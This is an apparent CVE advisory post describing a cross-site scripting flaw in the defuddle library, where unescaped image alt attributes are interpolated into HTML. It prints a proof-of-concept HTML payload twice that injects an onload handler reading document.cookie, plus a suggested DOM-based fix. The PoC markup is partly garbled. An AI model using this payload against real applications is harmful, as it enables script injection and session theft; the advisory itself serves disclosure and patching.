Listen to this Post
The vulnerability resides in the `_findContentBySchemaText` method within src/defuddle.ts. This method constructs an HTML string by directly interpolating the `src` and `alt` attribute values retrieved via `getAttribute()` from an image element. No escaping or sanitization is applied during this string interpolation. An attacker can craft an `alt` attribute containing a double quote (") to break out of the attribute context, followed by malicious event handler attributes such as onload=alert(document.cookie). Because the interpolation occurs at the string level before any DOM parsing, existing sanitization routines like `_stripUnsafeElements()` (which strips `on` attributes from DOM nodes) are ineffective—the dangerous attributes are created only in the final HTML string. The attack requires a specific HTML structure with schema.org metadata that triggers the fallback image extraction logic, placing a sibling image with a poisoned `alt` value. When the resulting HTML is rendered by any application using defuddle (e.g., browser extensions, web clippers, reader modes), the injected event handler executes arbitrary JavaScript, leading to cross-site scripting.
dailycve form:
Platform: Defuddle
Version: Versions before patch
Vulnerability: Alt attribute XSS
Severity: Critical
date: 2024-06-01
Prediction: Patch expected soon
What Undercode Say:
Clone the repository
git clone https://github.com/defuddle/defuddle.git
cd defuddle
Checkout a vulnerable version (example commit before fix)
git checkout <vulnerable-commit-hash>
Install dependencies (if Node.js project)
npm install
Create a test file with the PoC HTML (poc.html)
cat > poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
<>PoC</>
<script type="application/ld+json">
{"@type": "", "text": "Long text repeated many times to exceed the extracted content word count. Long text repeated many times to exceed the extracted content word count. Long text repeated many times to exceed the extracted content word count."}
</script>
</head>
<body>
<>Short.</p></>
<div class="post-container">
Extra text to inflate parent word count padding padding padding.
<div class="post-body">
Long text repeated many times to exceed the extracted content word count. Long text repeated many times to exceed the extracted content word count. Long text repeated many times to exceed the extracted content word count.
</div>
<img width="800" height="600" src="https://example.com/photo.jpg" alt='pwned" onload="alert(document.cookie)'>
</div>
<p></body>
</html>
EOF
Run defuddle on the PoC file (command depends on how defuddle is used)
Example: node dist/cli.js poc.html
Exploit:
<!DOCTYPE html>
<html>
<head>
<>PoC</>
<script type="application/ld+json">
{"@type": "", "text": "Long text repeated many times to exceed the extracted content word count. Long text repeated many times to exceed the extracted content word count. Long text repeated many times to exceed the extracted content word count."}
</script>
</head>
<body>
<>Short.</p></>
<div class="post-container">
Extra text to inflate parent word count padding padding padding.
<div class="post-body">
Long text repeated many times to exceed the extracted content word count. Long text repeated many times to exceed the extracted content word count. Long text repeated many times to exceed the extracted content word count.
</div>
<img width="800" height="600" src="https://example.com/photo.jpg" alt='pwned" onload="alert(document.cookie)'>
</div>
<p></body>
</html>
When processed by defuddle, the output becomes:
<img src="https://example.com/photo.jpg" alt="pwned" onload="alert(document.cookie)">
The `onload` event handler executes JavaScript in the context of the page using the rendered output.
Protection from this CVE:
- Upgrade to a patched version of defuddle once available.
- Apply the suggested fix: use DOM API methods instead of string interpolation:
if (imageSrc) { const img = this.doc.createElement('img'); img.setAttribute('src', imageSrc); img.setAttribute('alt', imageAlt); html += img.outerHTML; } - If immediate patching is not possible, manually sanitize attribute values by escaping quotes and HTML special characters before interpolation.
- Avoid rendering untrusted HTML content processed by defuddle in sensitive contexts.
Impact:
Successful exploitation allows arbitrary JavaScript execution (XSS) in any application that renders defuddle’s output, including browser extensions, web clippers, and reader modes. This can lead to cookie theft, session hijacking, defacement, or further attacks against users. The vulnerability is triggered by specially crafted HTML containing schema.org data and a malicious image `alt` attribute.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow DailyCVE & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin
Flux Operator, Privilege Escalation, CVE-2026-23990 (Medium)
